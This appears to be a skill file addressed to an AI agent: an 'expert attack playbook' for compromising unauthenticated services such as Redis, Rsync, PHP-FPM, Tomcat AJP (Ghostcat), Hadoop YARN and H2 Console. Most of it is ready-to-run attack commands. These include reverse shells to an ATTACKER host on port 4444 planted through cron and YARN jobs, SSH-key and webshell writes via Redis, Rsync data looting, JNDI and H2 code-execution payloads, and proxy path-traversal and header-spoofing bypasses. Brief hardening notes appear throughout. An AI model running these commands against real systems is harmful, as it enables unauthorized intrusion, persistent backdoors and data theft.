- SKILL: Unauthorized Access to Common Services — Expert Attack Playbook
- AI LOAD INSTRUCTION
- Expert techniques for exploiting unauthenticated or weakly authenticated management services. Covers Redis write-to-RCE, Rsync data theft, PHP-FPM code execution, Ghostcat AJP file read, Hadoop YARN job submission, and H2 Console JNDI. These are infrastructure-level findings distinct from web application vulnerabilities. 0. RELATED ROUTING ssrf-server-side-request-forgery when these services are reachable via SSRF (e.g., SSRF → Redis) jndi-injection when H2 Console or similar accepts JNDI connection strings deserialization-insecure when RMI Registry or T3 protocol is exposed network-protocol-attacks for layer 2/3 attacks during service enumeration reverse-shell-techniques for shell payloads after gaining command execution Comprehensive Port Reference Also load PORT_SERVICE_MATRIX.md when you need: Full exploitation matrix organized by port number (20+ services) Enumeration, brute force, and post-exploitation per service Quick triage during nmap/masscan output analysis 1. DISCOVERY — PORT SCANNING nmap -sV -p 6379,873 ,9000,8009,8088,8082,1099,9200,5984,2375,27017,11211 TARGET
Key ports:
6379 — Redis
873 — Rsync
9000 — PHP-FPM (FastCGI)
8009 — AJP (Tomcat Ghostcat)
8088 — Hadoop YARN ResourceManager
8082 — H2 Console (or embedded in Spring Boot)
1099 — Java RMI Registry
9200 — Elasticsearch
5984 — CouchDB
2375 — Docker API
27017 — MongoDB
11211 — Memcached
- REDIS (PORT 6379) Detection redis-cli -h TARGET ping
Response: PONG = unauthenticated access confirmed
redis-cli -h TARGET INFO server
Returns Redis version, OS, config
Write SSH Authorized Keys
Generate key pair:
ssh-keygen -t rsa -f redis_rsa
Write public key to Redis, then dump to authorized_keys:
redis-cli -h TARGET flushall cat redis_rsa.pub | redis-cli -h TARGET -x set ssh_key redis-cli -h TARGET config set dir /root/.ssh redis-cli -h TARGET config set dbfilename authorized_keys redis-cli -h TARGET save
Connect:
ssh -i redis_rsa root@TARGET Write Crontab (Reverse Shell) redis-cli -h TARGET
set x " \n \n */1 * * * * bash -i >& /dev/tcp/ATTACKER/4444 0>&1 \n \n "
config set dir /var/spool/cron/
config set dbfilename root
save Write Webshell redis-cli -h TARGET
set webshell ""
config set dir /var/www/html/
config set dbfilename shell.php
save
Access: http://TARGET/shell.php?cmd=id
Master-Slave Replication RCE Use redis-rogue-server to exploit master-slave replication for loading malicious .so module: python3 redis-rogue-server.py --rhost TARGET --lhost ATTACKER
Loads module via SLAVEOF → MODULE LOAD → system.exec
Hardening requirepass STRONG_PASSWORD bind 127.0.0.1 protected-mode yes rename-command CONFIG "" rename-command FLUSHALL "" 3. RSYNC (PORT 873) Detection rsync TARGET::
Lists available modules (shares) if anonymous access allowed
rsync -av TARGET::MODULE_NAME /tmp/loot/
Download entire module contents
Exploitation — Write Crontab
Create reverse shell cron:
echo '*/1 * * * * bash -i >& /dev/tcp/ATTACKER/4444 0>&1'
/tmp/evil_cron
Upload to target's crontab (if writable module maps to /etc/ or similar):
rsync -av /tmp/evil_cron TARGET::MODULE/cron.d/backdoor Hardening
/etc/rsyncd.conf:
auth users = rsync_user secrets file = /etc/rsyncd.secrets list = no hosts allow = 10.0.0.0/8 read only = yes 4. PHP-FPM / FASTCGI (PORT 9000) Mechanism PHP-FPM listens for FastCGI requests. If exposed to the network (instead of Unix socket), an attacker can send crafted FastCGI packets to execute arbitrary PHP code. Exploitation
Using fcgi_exp or similar tool:
python3 fpm.py TARGET 9000 /var/www/html/index.php -c ""
Key parameters in FastCGI request:
SCRIPT_FILENAME = path to any existing .php file
PHP_VALUE = "auto_prepend_file = php://input" (injects POST body as PHP code)
PHP_ADMIN_VALUE = "allow_url_include = On"
Key FastCGI Environment Variables for Exploitation SCRIPT_FILENAME = /var/www/html/index.php # must point to an existing .php file PHP_VALUE = auto_prepend_file = php://input # injects POST body as PHP code PHP_ADMIN_VALUE = allow_url_include = On # enables remote inclusion Via SSRF (gopher) gopher://TARGET:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00...
Encoded FastCGI packet
Tool: Gopherus generates the gopher:// URL
python3 gopherus.py --exploit fastcgi Hardening ; php-fpm.conf — bind to socket only: listen = /var/run/php-fpm.sock ; If TCP required, restrict: listen.allowed_clients = 127.0.0.1 5. GHOSTCAT — AJP (PORT 8009) — CVE-2020-1938 Mechanism Apache JServ Protocol (AJP) is used between reverse proxy and Tomcat. AJP trusts all incoming data — an attacker connecting directly can set javax.servlet.include.request_uri to read arbitrary files from the webapp directory. File Read
Using ajpShooter or similar:
python3 ajpShooter.py TARGET 8009 /WEB-INF/web.xml read
Reads any file within the webapp root:
/WEB-INF/web.xml — deployment descriptor
/WEB-INF/classes/*.class — compiled Java classes
/WEB-INF/lib/*.jar — library JARs
File Include → RCE If a file upload exists (e.g., uploaded JSP disguised as image), AJP can include it as JSP: python3 ajpShooter.py TARGET 8009 /uploaded_avatar.txt eval
If the file contains JSP code, it gets executed
Hardening
< Connector port = " 8009 " protocol = " AJP/1.3 " secretRequired = " true " secret = " STRONG_SECRET " />
- HADOOP YARN RESOURCEMANAGER (PORT 8088) Detection curl http://TARGET:8088/cluster
If accessible → unauthenticated YARN ResourceManager UI
RCE via Application Submission
Submit a MapReduce application that executes a command:
curl -s -X POST http://TARGET:8088/ws/v1/cluster/apps/new-application
Returns:
curl -s -X POST http://TARGET:8088/ws/v1/cluster/apps \ -H "Content-Type: application/json" \ -d '{ "application-id": "application_xxx_0001", "application-name": "test", "am-container-spec": { "commands": {"command": "/bin/bash -i >& /dev/tcp/ATTACKER/4444 0>&1"} }, "application-type": "YARN" }' Hardening Enable Kerberos authentication; restrict network access to management ports. 7. H2 DATABASE CONSOLE Detection H2 Console is often enabled in Spring Boot apps via: spring.h2.console.enabled=true spring.h2.console.settings.web-allow-others=true Access: http://TARGET:PORT/h2-console JNDI Injection via Connection String In the H2 Console login form, the JDBC URL field accepts JNDI. BeanFactory + EL bypass (works on Java 8u252+):
JDBC URL in login form:
javax.naming.InitialContext
LDAP response attributes:
javaClassName: javax.el.ELProcessor javaFactory: org.apache.naming.factory.BeanFactory forceString: x=eval x: Runtime.getRuntime().exec("id") Also see jndi-injection for the full JNDI/BeanFactory exploitation flow. RCE via RUNSCRIPT CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException { Runtime.getRuntime().exec(cmd); return "ok"; }' ; CALL EXEC ( 'id' ) ; 8. QUICK REFERENCE
Redis — check auth:
redis-cli -h TARGET ping
Redis — write webshell:
SET x "" CONFIG SET dir /var/www/html/ CONFIG SET dbfilename shell.php SAVE
Rsync — list modules:
rsync TARGET::
Ghostcat — read web.xml:
python3 ajpShooter.py TARGET 8009 /WEB-INF/web.xml read
YARN — submit RCE job:
curl -X POST http://TARGET:8088/ws/v1/cluster/apps/new-application
H2 — RCE via alias:
CREATE ALIAS EXEC AS '...Runtime.exec...'; CALL EXEC('id'); 9. REVERSE PROXY MISCONFIGURATION Nginx Off-By-Slash Path Traversal
Vulnerable configuration:
location /static { alias /var/www/static/ ; }
Access: /static../etc/passwd → resolves to /var/www/etc/passwd
The missing trailing slash on location causes path traversal
Fix: location /static/ (with trailing slash matching alias)
Nginx Missing Root Location
If no root location defined and alias is used:
Attacker may access nginx.conf or other server files
GET /..%2f..%2fetc/nginx/nginx.conf HTTP/1.1 X-Forwarded-For / X-Real-IP Trust
If backend trusts these headers for IP-based auth:
GET /admin HTTP/1.1 X-Forwarded-For: 127.0.0.1 X-Real-IP: 127.0.0.1 True-Client-IP: 127.0.0.1
May bypass IP whitelist for admin panels
Caddy Template Injection
Caddy with templates enabled:
If user input reaches Caddy template rendering:
{{.Req.Host}} → Information disclosure {{readFile "/etc/passwd"}} → Local file read via Go template
This is essentially a Go template injection through proxy config
Useful Tools yandex/gixy — Nginx configuration analyzer Raelize/Kyubi — Reverse proxy misconfiguration scanner GerbenJavado/bypass-url-parser — URL parser confusion tester